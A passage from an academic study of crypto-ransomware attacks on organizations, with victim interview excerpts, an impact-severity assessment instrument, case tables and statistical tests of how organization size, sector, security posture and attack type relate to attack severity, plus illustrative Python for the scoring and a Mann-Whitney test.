An inductive content analysis method was used to analyse data and develop the Impact Assessment Instrument. Within the interview transcripts, the impact of crypto-ransomware incidents emerged as a major topic. Interviewees eagerly described their experiences of being attacked, particularly focusing on the consequences of crypto-ransomware attacks. For example, respondents from GovSecJN, EducInstFB, LawEnfM, GovSecA and HealthSerJU spoke in great detail about the despair and distress they experienced. An IT/Security Manager from GovSecJN, a large public sector organization, explained how business continuity disruption affected them:

There was an impact on service delivery – we could not do what we were supposed to do. It was significant for us. Besides, all our resources were directed towards the incident instead of doing our job.

An IT/Security Manager from LawEnfJU reported a similar experience:

Ransomware encrypted all of our data files, which, in effect, took the agency offline for about 10 days. This was extremely critical as we could not do our job. We had the server up-and-running in 10 days and then it took another 10 days to manually re-enter all data. So, the attack critically affected the operations of the department for about 20 days … . The overall impact of this attack was severe, definitely.

An Executive Manager from EducInstFB, a large public organization, shared with us that a Generation III.a crypto-ransomware encrypted hundreds of machines (desktops, laptops and servers). As a result, several critical business functions were disabled and important data were inaccessible. The victim disclosed that various security holes – including ineffective backups, poor patching regimes, the lack of network visibility and feeble access control management practices – led to infection and subsequent dramatic consequences.

GovSecA, a large public organization, suffered an unprecedented attack by Generation III.a crypto-ransomware, where close on 100 servers got encrypted, affecting the operations of the organization for months. Most importantly, the victim lost a lot of critical data because they only had partial backups. At the time of the interview, GovSecA was already in post-attack recovery for 8 months. The interviewee shared that the recovery was still not completed at this point. An IT/Security Manager from GovSecA described their experience as follows:

We all came back to work on Tuesday morning after a bank holiday weekend and the sun was streaming in through the windows. The cleaners have been in, the office looked great. Everyone felt refreshed after the long weekend. And it took a while for us to realise what happened; that all computing had been turned to stone [encrypted]. Virtually nothing was left untouched. If half of the building had fallen off, you would understand that something has happened. But everything looked great. But it was not – the organisation could not operate.

An Executive Police Officer from LawEnfM, a public SME, described how the organization suffered two ransomware attacks within 2 weeks, affecting critical data:

We are a full-service law enforcement agency and we have a wide variety of data, some of which is very sensitive. For example, data relevant to criminal incidents like manslaughter cases, child pornography, child sex cases. Several months worth of this data was encrypted, which was pretty significant to us … . While we were recovering after the first attack, we were very unfortunate to get infected by ransomware again.

Comments such as in these few selected excerpts featured regularly in the interviews. We observed that when victims described the impact of ransomware attacks, they focused on factors such as business continuity disruption, recovery time, the number of devices affected, how critical encrypted information was to business and information loss.

On the contrary, interviewees from LawEnfJ and GovSecJ talked about factors that effectively saved the organization from far worse outcomes and emphasized that organizations must be prepared for these attacks or suffer severe consequences. For example, an IT/Security Manager from LawEnfJ, a public SME, shared the following:

We practice good basic security principles. We have backups in multiple locations … . It comes down to basics like staying up to date with industry. Just recently we went through this massive patching for Intel processors and other processes that could be leveraged into a whole host of attacks … . We were well-prepared for the attack … . We restored everything over a weekend. We were infected on Friday and back up-and-running on Monday.

Similarly, an IT/Security Manager from GovSecJ, a large public organization, explained how they were able to recover with little inconvenience:

An Incident Management Plan is crucial during cyber-attacks. Instead of running around with our hands up in the air, screaming for help, our response was logical and structured … . We lost some data due to incremental backups but nothing significant that would have stopped an organisation from functioning … . The infection took place at approximately 9 in the morning. By the end of the day, data was restored, and everything was back to normal.

As a result of our data analysis in Phase 1, five categories of negative outcomes emerged from the data, namely ‘business continuity disruption timeline’, ‘recovery time’, ‘affected devices’, ‘encrypted information critical to business’ and ‘information loss’. Under each of these categories, the data enabled us to build impact descriptors ranging across three degrees of severity (low, medium and high). In Table 3, we present the severity descriptors for the five impact categories and corresponding attacks.

Table 3. Impact Assessment Instrument and corresponding victims

Degree of severity (3-point ordinal scale):
Impact item | 1 = Low | 2 = Medium | 3 = High
Business continuity disruption timeframe | Up to 1 week | Up to 2 weeks | More than 2 weeks
Recovery time | Up to 1 week | Up to 1 month | Several months or more, if at all
Affected devices | One or more user devices, possibly including shares on one or more servers | Several devices and more than one server; or where a central server is encrypted, affecting not just individual users but the functioning of a whole department | All or the majority of devices, completely or almost completely crippling IT systems
Encrypted information critical to business | Some data compromised, but nothing critical | Data critical to some business functions of low to medium priority | Data critical to the majority of business functions, or to some high-priority function(s)
Information loss | No loss, or some loss acceptable with incremental backups | Loss affecting some critical business functions | Loss affecting all or the majority of critical business functions

Given the broad range of organization types and sectors in our sample, we anticipated that it would be difficult to arrive at a consensus on what constitutes ‘Low’, ‘Medium’ and ‘High’ levels of severity. For example, an outcome that might be regarded as being of ‘Low’ severity by one respondent could possibly be regarded as ‘High’ by another, depending on the nature of their business and level of dependency on critical IT systems. However, there was a remarkable degree of consistency among the respondents. There is a general acceptance that any ransomware attack, however minor, is likely to result in an interruption of at least a few days rather than hours. Thus, recovery times and business continuity disruption of a number of days (up to a week) were rated as being on the ‘Low’ end of the spectrum because, although any disruption is traumatic, in relative terms that is the least amount of time that is expected to be lost. As one interviewee put it,

Considering the impact and seriousness of the ransomware, it is going to sound strange, but I think that to only lose twelve hours worth of data is an acceptable outcome. If we had not backed up, we would have lost 47,000 files, clearly that would have been a far more significant issue. (IT/Security Manager, GovSecJN)

The Impact Assessment Instrument presented in Table 3 is derived from empirical data and reflects the actual consequences of crypto-ransomware attacks as described by the victims. All five of the items shown in the table are components of the overall severity of a ransomware attack. Because the five items are measured on a three-point ordinal scale, as opposed to a multiple-point continuous scale, we used the ordinal alpha coefficient [45] to test for internal reliability. The value of ordinal α = 0.96 indicates a high degree of agreement between the five items.

To compute a composite score for overall severity, we considered using the average or median of the five items but decided to use the maximum. The logic behind this reasoning is that if any of the items is evaluated as ‘High’, it means that the attack represented a serious shock to the organization with major consequences. Therefore, a ‘High’ severity value for any single item trumps all the others, even if they all have lesser values. This also gets around the aforementioned problem whereby the assessment instrument might misevaluate a particular item as ‘Low’ when in fact, because of the organization’s circumstances, it should be ‘High’; in such cases, the likelihood is that at least one other item would have a ‘High’ rating and hence the overall severity would correctly be evaluated as ‘High’.

Next, using the Impact Assessment Instrument shown in Table 3, we analysed all of the initial 15 cases (interview transcripts) to determine the extent of the attack impact. We assigned the degree of severity for each of the five impact items. An exemplar of this assessment exercise is provided in Appendix 3.

We were conscious of the limitation that the initial version of the Impact Assessment Instrument was based on data collected from 10 public organizations, with no private businesses. To remedy this, as we collected data on a further 45 cases, including both public and private organizations, we asked interviewees to assess the severity of ransomware attacks using our scale (i.e. low, medium, high) and comment on the reasons for their answer. The purpose of this exercise was to validate our instrument and confirm that the categories that emerged initially were relevant across the whole sample. We also validated the instrument by consulting with experienced police officers. We found that the instrument gave a reliable measure of the severity of an incident as perceived by the victim.

In order to test our hypotheses, we needed to collect more data on crypto-ransomware incidents. It has been widely acknowledged that collecting data on cyberattacks is extremely difficult. In Phase 1, it took us over 6 months to find organizations that were willing to share sensitive matters relevant to the attacks. Therefore, we decided to approach data collection differently in Phase 2, seeking out police officers from UK Cybercrime Units who had extensive experience in dealing with crypto-ransomware attacks. Such experience mainly included helping organizations to respond effectively to the attacks, understanding what caused them, providing emotional support to victims if necessary and offering post-attack advice. Our expectation was that each police officer would be able to provide relevant information on several ransomware incidents at a time, which would make the process of data collection more manageable.

We succeeded in connecting with 10 police officers (four Detective Sergeants and six Detective Constables) and one Civilian Cybercrime Investigator, who provided information on 22 usable ransomware incidents via semi-structured interviews and one focus group. Two police officers were interviewed twice as they were able to add new information. The average professional experience of the study respondents was 19 years. We also managed to collect data on 22 more cases with a Detective Inspector, who, unfortunately, was not able to meet with us face-to-face but agreed to provide data via a structured questionnaire (sent over e-mail). Additionally, we interviewed an IT/Security Manager with over 20 years of professional experience, which added one final case to our database of ransomware incidents. Relevant information is available in Appendix 1 (Cases 16–60). Due to the aforementioned access constraints, a snowballing technique was used to collect data for Phase 2.

The questionnaire and second-phase interview guide (see Appendix 4) were based on the Impact Assessment Instrument and the hypotheses. We asked questions that would help us to assess the impact of an attack. We also collected profile information on organizations (e.g. size, sector and industry) and characteristics of attacks (e.g. attack type, crypto-ransomware propagation class and attack target). Additionally, we included questions that would help us classify the security posture of each organization. For this purpose, we used the taxonomy of crypto-ransomware countermeasures developed in our previous work [8]. The headings from this taxonomy served as a guide for the questions. Therefore, in order to assess the security posture of each victim organization, we asked interviewees about security education, policies and practices, technical measures and network security, the incident response strategy and the attitudes of management towards cybersecurity (see Appendix 5).

Overall, 45 additional cases of ransomware attacks were examined in Phase 2, bringing the total to 60 cases. For five of the 60 cases, there was insufficient data to be able to determine the overall impact severity, so those cases were discarded as being unusable, leaving us with 55 usable cases. Although a snowballing technique was used to collect data in Phase 2, our overall sample included organizations of different sizes and from different sectors. Attacks were recorded against both humans and machines by different crypto-ransomware propagation classes. Different levels of security posture were noted among participants, ranging from weak to strong. Finally, the sample contained opportunistic attacks as well as targeted ones.

For a few of the cases, we did not have values for all of the five items in the Impact Assessment; in those cases, we evaluated the overall impact based on the maximum of the items for which we had values, supported by an inspection of qualitative data from those cases. We found that this method of computing the composite score for overall severity gave the most accurate results, as validated using participants’ personal assessment of the attack impact and our own judgement based on what we gleaned from interviews. Results of the assessment exercise are available in Table 4.

Table 4. Impact Assessment Instrument and observed frequencies among respondents (n = 55)

Degree of severity (3-point ordinal scale); the n after each item is the number of cases rated on that item, and the percentage after each cell is the share of those cases:
Impact item | 1 = Low | 2 = Medium | 3 = High
Business continuity disruption timeframe (n = 52) | Up to 1 week (65%) | Up to 2 weeks (14%) | More than 2 weeks (21%)
Recovery time (n = 51) | Up to 1 week (59%) | Up to 1 month (22%) | Several months or more, if at all (19%)
Affected devices (n = 53) | One or more user devices, possibly including shares on one or more servers (53%) | Several devices and more than one server; or where a central server is encrypted, affecting not just individual users but the functioning of a whole department (19%) | All or the majority of devices, completely or almost completely crippling IT systems (28%)
Encrypted information critical to business (n = 51) | Some data compromised, but nothing critical (29%) | Data critical to some business functions of low to medium priority (24%) | Data critical to the majority of business functions, or to some high-priority function(s) (47%)
Information loss (n = 47) | No loss, or some loss acceptable with incremental backups (57%) | Loss affecting some critical business functions (32%) | Loss affecting all or the majority of critical business functions (11%)
Overall impact severity (composite score) (n = 55) | Low (27%) | Medium (20%) | High (53%)

Note: Overall n = 55, but item response rates ranged from 85% (47) to 96% (53).
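The scoring rules described above (overall severity is the maximum of the five items; unrated items are ignored; a case with nothing rated is discarded) are simple enough to write down exactly. The following Python is an added example, not the study's own analysis code: the item keys are my own labels for the five Table 3 items, and the case records are constructed to illustrate the rules (one mirrors the GovSecA pattern, one the Friday-to-Monday restore, one a partial record with a single High), not the study's 55 cases. `compare_rules` shows why the max rule differs from a mean or median on the partial record, and `tabulate` reproduces the Table 4 layout with a per-item n.

```python
"""Composite severity scoring for the Impact Assessment Instrument (Table 3).

Added example; not code from the study. Encodes the rules stated in the text:
five items on a 1-3 ordinal scale, overall severity = max of the rated items,
unrated items ignored, cases with no rated item discarded.
"""
from collections import Counter
from statistics import mean, median
from typing import Dict, List, Optional

# My own labels for the five Table 3 items (assumption, not the study's field names).
ITEMS = ("disruption", "recovery", "devices", "critical_info", "info_loss")
LOW, MEDIUM, HIGH = 1, 2, 3


def rated_values(ratings: Dict[str, Optional[int]]) -> List[int]:
    """Return the ratings that are present, validating the ordinal scale."""
    values = [ratings.get(item) for item in ITEMS]
    values = [v for v in values if v is not None]
    bad = [v for v in values if v not in (LOW, MEDIUM, HIGH)]
    if bad:
        raise ValueError(f"ratings must be 1, 2 or 3, got {bad}")
    return values


def composite_severity(ratings: Dict[str, Optional[int]]) -> Optional[int]:
    """Overall severity by the 'max' rule: any single High makes the attack High.
    Returns None when no item could be rated (the case is unusable)."""
    values = rated_values(ratings)
    return max(values) if values else None


def compare_rules(ratings: Dict[str, Optional[int]]) -> dict:
    """Side-by-side max / mean / median, to show why the max rule was chosen."""
    values = rated_values(ratings)
    return {"max": max(values), "mean": mean(values), "median": median(values)}


def tabulate(cases: Dict[str, Dict[str, Optional[int]]]) -> dict:
    """Per-item frequency counts with the item-level n (Table 4 layout), plus the
    composite row computed over the usable cases only."""
    table = {}
    for item in ITEMS:
        values = [c.get(item) for c in cases.values() if c.get(item) is not None]
        table[item] = {"n": len(values), "counts": Counter(values)}
    overall = [s for s in (composite_severity(c) for c in cases.values()) if s is not None]
    table["overall"] = {"n": len(overall), "counts": Counter(overall)}
    return table


# Constructed cases (illustrative only, not the study's data).
CASES = {
    # nearly every item High: the 'close on 100 servers encrypted' pattern
    "org_a": dict(disruption=3, recovery=3, devices=3, critical_info=3, info_loss=2),
    # infected Friday, restored from good backups by Monday
    "org_b": dict(disruption=1, recovery=1, devices=2, critical_info=1, info_loss=1),
    # partial record: one item High, one item never rated
    "org_c": dict(disruption=1, recovery=1, devices=1, critical_info=3, info_loss=None),
    "org_d": dict(disruption=2, recovery=2, devices=1, critical_info=2, info_loss=1),
    # nothing could be rated: dropped from the composite row
    "org_e": {},
}

if __name__ == "__main__":
    for name, ratings in CASES.items():
        print(name, composite_severity(ratings))
    print("org_c under each rule:", compare_rules(CASES["org_c"]))
    for item, row in tabulate(CASES).items():
        print(item, row)
```

On the partial record `org_c` the max rule returns High while the mean is 1.5 and the median Low, which is exactly the case the text argues for: a single High item represents a serious shock that the central tendency would hide.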

Quantitative data analysis

Overall, our sample included 50 organizations of different sizes, sectors (i.e. public or private) and industries, yielding 55 usable cases of crypto-ransomware attacks. In total, 35 (70%) of the organizations were SMEs, while 15 (30%) were large organizations. We used the European Commission guidance to define the organization’s size [ 46 ]. The industries were broad and varied, including IT, government, law enforcement, education, healthcare, financial services, construction, retail, logistics, utility providers and several other categories. Of the 50 organizations, 19 (38%) were in the public sector and 31 (62%) were in the private sector. Five (10%) were located in North America and 45 (90%) in the UK (see Appendix 7). Security postures were determined for 34 of the 50 organizations (see Table 5). Twenty organizations (59%) had a weak security posture, 13 (38%) had a medium security posture and only one had a strong posture. We used the criteria outlined in Appendices 5 and 6 to assess the security postures of organizations.

Table 5. Cross-tabulations for Hypotheses 1a, 1b and 1c (attack severity, n (%))

                                     Low        Medium     High
H1a: Organization size (n = 50)
  SME                                7 (20)     8 (23)     20 (57)
  Large                              5 (33)     2 (13)     8 (53)
H1b: Sector (n = 50)*
  Public                             5 (26)     7 (37)     7 (37)
  Private                            7 (23)     3 (10)     21 (68)
H1c: Security posture (n = 34)***
  Weak                               0 (0)      4 (20)     16 (80)
  Medium                             4 (31)     6 (46)     3 (23)
  Strong                             1 (100)    0 (0)      0 (0)

* P < 0.05; *** P < 0.001 (two-sided Fisher’s exact test).

Except where otherwise stated, the hypotheses were assessed using two-sided Fisher’s Exact tests. The size of our sample provides acceptable power to detect moderate-to-large relationships between categorical variables using this technique. Where data was missing, cases were excluded; the number of relevant cases ( n ) is stated in the results of each test.

We found that the degree of severity of a ransomware attack did not vary by organizational size, P = 0.542. Indeed, the majority of attacks in both SMEs and large organizations were of high severity (57% and 53%, respectively).

The severity did, however, vary according to organizational sector. Private organizations were considerably more likely than public organizations to experience serious negative consequences as a result of ransomware attacks, P = 0.044. Of the private organizations, 68% were hit by attacks of the highest severity, whereas a much lower percentage (37%) of public organizations were as badly affected. This finding supports Hypothesis 1b.

Most tellingly, impacts also varied with organizational security posture, such that those organizations with weak security postures were far more likely to experience a severe impact than were those with medium or strong postures, n  = 34, P < 0.001. Of the organizations that had a weak posture, 80% had been hit by ransomware attacks of high severity. Thus, Hypothesis 1c is also supported.

Post hoc, we found that security posture did not differ according to organization size, with the majority of organizations – 57% of SMEs and 64% of large organizations – having a weak security posture. However, when looking at the relationship between organization sector and security posture, a significant difference ( P = 0.035) was observed. Public organizations had considerably stronger security postures than those in the private sector. This may partly explain why the impact of attacks on public sector organizations was not as severe.

As can be seen in Appendix 1, the 50 organizations spanned 23 different industries (i.e. financial services, healthcare, retail, etc.), so it was not meaningful to conduct correlation analysis on this variable as the numbers were spread too thin. However, one observation that stands out is that of the seven respondents from the IT industry, six of them (86%) experienced attacks of high severity. This is above average and somewhat surprising, although with such a small sub-sample it is not possible to draw reliable inferences.

Looking then at the crypto-ransomware propagation classes, 32 (58%) were of type Generation II, while 23 (42%) were of type Generation III (the Generation III.a and Generation III.b classes were merged in the data analysis because of their similar propagation characteristics). In total, 38 attacks (72%) were opportunistic and 15 (28%) were targeted. Twenty-five attacks (47%) targeted humans and 28 (53%) targeted machines (see Table 6).

Table 6. Cross-tabulations for Hypotheses 2a, 2b and 2c (attack severity, n (%))

                                     Low        Medium     High
H2a: Crypto-ransomware type (n = 55)
  Generation II                      10 (31)    8 (25)     14 (44)
  Generation III                     5 (22)     3 (13)     15 (65)
H2b: Attack type (n = 53)†
  Opportunistic                      12 (32)    9 (24)     17 (45)
  Targeted                           1 (7)      2 (13)     12 (80)
H2c: Attack target (n = 53)
  Human                              5 (20)     6 (24)     14 (56)
  Machine                            8 (29)     5 (18)     15 (54)

† P < 0.1 (two-sided Fisher’s exact test).

The degree of severity did not vary with the crypto-ransomware propagation class (i.e. Generation II vs. Generation III) n  = 55, P = 0.334, nor with the attack target (i.e. human vs. machine), n  = 53, P = 0.813.

The type of the attack (opportunistic vs. targeted) was also considered. Targeted attacks were more likely than opportunistic ones to lead to severe consequences, although Fisher’s exact test on the cross-tabulation fell short of the 5% level (n = 53, P = 0.063): 80% of targeted attacks gave rise to impacts of high severity, whereas a considerably lower proportion of opportunistic attacks (45%) had high negative consequences. Treating severity as an ordinal variable, a Mann–Whitney U test finds this difference statistically significant (U = 177, P = 0.02), so we are inclined to accept Hypothesis 2b.
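The Mann–Whitney statistic quoted above can be recomputed from nothing more than the Table 6 counts, because the severity scale has only three levels and every observation within a level is a tie. The Python below is an added example, not the paper’s own analysis code: it counts the pairs in which one group outranks the other (tied pairs count one half), which gives U = 177 for opportunistic (12, 9, 17) versus targeted (1, 2, 12), and then applies the tie-corrected normal approximation for the two-sided P value. The paper does not say which software or correction it used; the approximation is this example’s choice, and it reproduces P ≈ 0.02.

```python
"""Mann-Whitney U for ordinal severity data given as grouped counts.

Added example, not code from the paper. Reproduces U = 177 from the
Table 6 counts for opportunistic versus targeted attacks across the
Low/Medium/High severity levels, with a tie-corrected normal
approximation for the two-sided P value (this example's choice; the
paper does not state how its P value was obtained).
"""
import math


def _pairs_exceeding(counts_x, counts_y):
    """Pairs (x, y) with x ranked strictly above y, plus half of the tied pairs.

    Both count lists run from the lowest to the highest ordinal level.
    """
    u = 0.0
    for i, x in enumerate(counts_x):
        below = sum(counts_y[:i])               # y observations at a strictly lower level
        u += x * below + 0.5 * x * counts_y[i]  # ties at the same level count one half
    return u


def mann_whitney_grouped(counts_a, counts_b):
    """Return a dict with U_a, U_b, U (the smaller), z and the two-sided P."""
    if len(counts_a) != len(counts_b):
        raise ValueError("both groups must use the same ordinal levels")
    n_a, n_b = sum(counts_a), sum(counts_b)
    if n_a == 0 or n_b == 0:
        raise ValueError("each group needs at least one observation")
    u_a = _pairs_exceeding(counts_a, counts_b)
    u_b = n_a * n_b - u_a                       # U_a + U_b = n_a * n_b always holds
    n = n_a + n_b
    # Tie correction: every ordinal level is one tie group of size t = a + b.
    tie_term = sum(t ** 3 - t for t in (a + b for a, b in zip(counts_a, counts_b)))
    mean = n_a * n_b / 2.0
    var = n_a * n_b / 12.0 * ((n + 1) - tie_term / (n * (n - 1)))
    if var <= 0:                                # every observation tied at one level
        return {"U_a": u_a, "U_b": u_b, "U": min(u_a, u_b), "z": 0.0, "p": 1.0}
    z = (u_a - mean) / math.sqrt(var)
    p = math.erfc(abs(z) / math.sqrt(2.0))      # two-sided tail of the standard normal
    return {"U_a": u_a, "U_b": u_b, "U": min(u_a, u_b), "z": z, "p": p}


# Table 6, H2b (attack type); counts are ordered Low, Medium, High.
OPPORTUNISTIC = (12, 9, 17)   # n = 38
TARGETED = (1, 2, 12)         # n = 15


def attack_type_test():
    """Run the test on the Table 6 counts for opportunistic vs targeted attacks."""
    return mann_whitney_grouped(OPPORTUNISTIC, TARGETED)


if __name__ == "__main__":
    r = attack_type_test()
    print(f"U = {r['U']:.0f}, z = {r['z']:.2f}, two-sided P = {r['p']:.3f}")
```

U_a here is the number of pairs in which an opportunistic attack outranks a targeted one (177); the complementary U_b is 393, and the reported U is the smaller of the two, as in SPSS and scipy. With 13 + 11 + 29 tied observations the tie correction is substantial, which is why a textbook formula without it would give a noticeably different z.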

Post hoc, companies with a weak posture were much more likely to be attacked via machine vulnerabilities as the point of entry, whereas companies with medium or strong security postures were more likely to be attacked via social engineering (n = 34, P = 0.019). We also observed that 91% of targeted attacks were against organizations that had a weak security posture. Table 7 summarizes the results of the hypothesis tests.

Table 7. Results of hypothesis tests

Hypothesis 1a: An organization’s size influences the degree of severity of a ransomware attack. Result: Rejected
Hypothesis 1b: An organization’s sector influences the degree of severity of a ransomware attack. Result: Accepted
Hypothesis 1c: An organization’s security posture influences the degree of severity of a ransomware attack. Result: Accepted
Hypothesis 2a: The crypto-ransomware propagation class influences the impact severity of a ransomware attack. Result: Rejected
Hypothesis 2b: The attack type, i.e. opportunistic or targeted, influences the degree of severity of a ransomware attack. Result: Accepted
Hypothesis 2c: The attack target, i.e. human or machine, influences the degree of severity of a ransomware attack. Result: Rejected
Appendix 1. Attacks and organizations in the sample

Attack ID | Crypto-ransomware propagation class; attack target; attack type | Organization alias | Industry; size; sector
1 | Generation II; human; opportunistic | LawEnfJ | Law enforcement; SME; public
2 | Generation II; human; opportunistic | GovSecJN | Government; large; public
3 | Generation II; machine; opportunistic | GovSecJ | Government; large; public
4 | Generation II; human; opportunistic | |
5 | Generation II; machine; opportunistic | |
6 | Generation II; machine; opportunistic | |
7 | Generation II; machine; opportunistic | EducInstF | Education; large; public
8 | Generation III.a; machine; targeted | EducInstFB | Education; large; public
9 | Generation II; human; opportunistic | LawEnfM | Law enforcement; SME; public
10 | Generation II; human; opportunistic | |
11 | Generation III.a; machine; targeted | GovSecA | Government; large; public
12 | Generation II; human; opportunistic | LawEnfJU | Law enforcement; SME; public
13 | Generation III.b; machine; opportunistic | HealthSerJU | Health service; large; public
14 | Generation III.a; human; targeted | |
15 | Generation II; human; opportunistic | LawEnfF | Law enforcement; SME; public
16 | Generation II; machine; opportunistic | ITOrgA | IT; SME; private
17 | Generation III.a; machine; opportunistic | ConstrSupA | Construction; SME; private
18 | Generation III.a; machine; targeted | EducOrgA | Education; SME; public
19 | Generation II; human; opportunistic | SecOrgM | IT; SME; private
20 | Generation III.a; machine; targeted | ITOrgJL | IT; SME; private
21 | Generation II; human; opportunistic | CloudProvJL | IT; SME; private
22 | Generation III.a; machine; targeted | InfOrgJL | Infrastructure; SME; private
23 | Generation III.a; machine; opportunistic | ConstrSupJ | Construction; SME; private
24 | Generation II; human; opportunistic | RelOrgJ | Religion; SME; private
25 | Generation III.a; machine; targeted | SportClubJ | Entertainment; large; private
26 | Generation III.a; machine; targeted | UtilOrgD | Utilities; large; private
27 | Generation III.a; e-mail; targeted | VirtOrgD | IT; SME; private
28 | Generation III.a; machine; opportunistic | CleanOrgD | Cleaning; SME; private
29 | Generation II; human; opportunistic | EducOrgD | Education; SME; public
30 | Generation II; human; opportunistic | SerOrgD | Waste; SME; private
31 | Generation III.a; machine; opportunistic | EducCompD | Education; SME; public
32 | Generation III.a; machine; opportunistic | PrimOrgD | Education; SME; public
33 | Generation III.a; machine; opportunistic | LogOrgD | Logistics; SME; private
34 | Generation III.a; machine; opportunistic | ITCompD | IT; SME; private
35 | Generation III.a; machine; opportunistic | LogWarJ | Logistics; large; private
36 | Generation III.a; machine; targeted | TranspOrgJ | Transport; large; private
37 | Generation II; human; targeted | CharOrgJ | Charity; SME; public
38 | Generation II; human; opportunistic | EducInstJ | Education; large; public
39 | Generation II; human; opportunistic | DigMedM | Retailer; SME; private
40 | Generation II; human; opportunistic | ConstrSupAP | Construction; SME; private
41 | Generation II; human; opportunistic | FinOrgAP | Finance; SME; private
42 | Generation II; unknown; unknown | ConstrOrgAP | Construction; SME; private
43 | Generation II; unknown; unknown | LetAgenAP | Letting agency; SME; private
44 | Generation III.a; machine; targeted | EducOrgAP | Education; large; public
45 | Generation II; human; opportunistic | ConstrArcAP | Construction; SME; private
46 | Generation II; human; opportunistic | LegalOrgAP | Legal; SME; private
47 | Generation II; human; opportunistic | BevOrgAP | Beverages; SME; private
48 | Generation II; human; opportunistic | ChCarAP | Childcare; SME; public
49 | Generation III.a; machine; opportunistic | EducPrimAP | Education; large; public
50 | Generation II; human; opportunistic | RetOrgAP | Retailer; large; private
51 | Generation III.a; machine; opportunistic | |
52 | Generation III.a; machine; targeted | ITOrgAP | IT; SME; private
53 | Generation III.a; machine; opportunistic | MarkOrgAP | Marketing; SME; private
54 | Generation III.a; machine; opportunistic | ChemOrgAP | Chemical; SME; private
55 | Generation III.a; machine; opportunistic | EducHscAP | Education; large; public
56 | Generation III.a; machine; opportunistic | HospOrgAP | Hospitality; large; private
57 | Generation II; human; opportunistic | WasteOrgAP | Waste; SME; private
58 | Generation III.a; machine; opportunistic | FinCompAP | Finance; large; private
59 | Generation II; human; targeted | LegAdvAP | Legal; SME; private
60 | Generation III.a; machine; opportunistic | LegSolcAP | Legal; SME; private
Questions
Can you please tell me about the attack?
How would you rate the attack in terms of the level of severity?
Was your business affected by the ransomware attack?
 If yes, then to what extent?
 What functions were affected?
Were your data affected by the ransomware attack?
 If yes, then to what extent?
 Did you manage to restore the data that were encrypted?
In your opinion, are there any other negative impacts the ransomware attack had on your organization?
In your opinion, was the ransomware attack effective?
 If yes, why do you think ransomware was effective?
 What factors contributed to the effectiveness of this attack?
Worked examples of the composite scoring. For each crypto-ransomware attack, every impact item is mapped to its impact level and the corresponding digit (1 = Low, 2 = Medium, 3 = High); the attack impact level is the maximum digit across the items.

Attack 1
  Business continuity disruption timeframe: Up to 1 week → ‘Low’ → 1
  Encrypted information critical to business: Not critical → ‘Low’ → 1
  Information loss: Some loss acceptable with incremental backups → ‘Low’ → 1
  Affected devices: One desktop and shares on a server → ‘Low’ → 1
  Recovery time: Up to 2 weeks → ‘Low’ → 1
  Maximum value: 1
  Attack impact level: Low

Attack 9
  Business continuity disruption timeframe: Up to 1 week → ‘Low’ → 1
  Encrypted information critical to business: Critical to high priority functions → ‘High’ → 3
  Information loss: Some loss acceptable with incremental backups → ‘Low’ → 1
  Affected devices: Several desktops and shares on servers → ‘Low’ → 1
  Recovery time: Up to 1 month → ‘Medium’ → 2
  Maximum value: 3
  Attack impact level: High

Organization size does not matter, ransomware is indiscriminate

Within the observed sample, organization size, by itself, did not affect the severity of attacks. As outlined in the ‘Organisation characteristics: size and sector’ section, prior findings and opinions on the relationship between organization size and the incidence of ransomware attacks are rather inconsistent, with some saying that ransomware is mainly a problem for large enterprises and others saying that SMEs make up the bulk of the victims. Of the organizations that we observed, SMEs and large organizations were similarly impacted by ransomware attacks, and in most cases the impact was of high severity. This result is consistent with the views expressed by police officers from UK Cybercrime Units:

Ransomware is indiscriminate. It does not choose its victims. It chooses computers and those computers can be owned by anybody. (Detective Sergeant, CyberBL)

Ransomware does not target organisations of a particular size. All organisations, small, medium and large, are equally affected. (Detective Sergeant, CyberRM)

We observed several large organizations that experienced severe consequences of crypto-ransomware attacks (e.g. EducInstFB, GovSecA, HealthSerJU, SportClubJ, etc.) as well as SMEs (e.g. LawEnfJU, LawEnfF, ITOrgA, ConstrSupA, etc.). Therefore, regardless of how large or small an organization is, there is no room for complacency. SMEs often baulk at spending their limited funds on IT security measures, weighing things up on the basis of the financial cost of countermeasures vs. the expected probability and expected impact of an attack [ 30 ]. While we cannot offer any insights into the probability of an attack, we can speak about impact. Our findings show that if an organization has weak defence mechanisms, then regardless of whether it is an indigenous start-up or a large multi-national corporation, it is likely to experience very severe consequences in the event of a ransomware attack, such as having critical systems knocked out, heavy data losses and major disruptions of several weeks or more.

Private sector organizations are more likely to experience severe effects

Private sector organizations were more likely to report severe impacts than were those in the public sector in the sample observed in this study. This finding can be explained by the very nature of public organizations as compared to private businesses. Public sector organizations are generally state-owned with an obligation to provide some universal service such as healthcare, education, policing, or civic administration. The private sector, by contrast, is mainly composed of organizations whose ultimate purpose is not to serve the public but to generate profit. Cyberattacks on profit-driven organizations normally lead to substantial financial losses, reputational damage and loss of customers; the series of security breaches at TalkTalk is one such example [ 47 ]. If public organizations such as councils, state agencies and police departments experience a cyberattack, they may lose public confidence, but as sole suppliers they are not going to lose customers or revenue as they are publicly funded. As an IT/Security Manager from GovSecJN (a public organization fully funded by the UK government) explained:

Yes, there was a financial impact because resources were directed towards dealing with the cyber-attack. But it is difficult for us to quantify the financial impact … . The impact is different for us. It is the impact on service delivery to public. How we care for children. How we care for adults. Even road potholes – people could not report potholes because our systems were down.

Information from interviews with police officers working in the UK Cybercrime Units confirmed our impression that private sector organizations suffer more severe consequences; e.g. a specialist detective within the CyberTL unit told us based on his extensive experience that:

Cybercriminals know that the private sector depends on customer service. They know that these organisations will pay. Especially, we find that a lot of IT companies have been hit. I do not think this is because IT companies are more prone to targeting. It is just because when they are hit by ransomware, it is so much more devastating for them due to their dependency on customers.

This observation is in line with our finding that 86% of respondents from the IT industry experienced attacks of high severity. However, it should be noted that our sample is based on attack victims only and is not representative of the number of potential organizations in each industry. Additionally, public or semi-public institutions may experience an equivalent attack as being less critical simply because they are not in competition with other providers.

Against the threat of ransomware, a vigilant security posture is vital

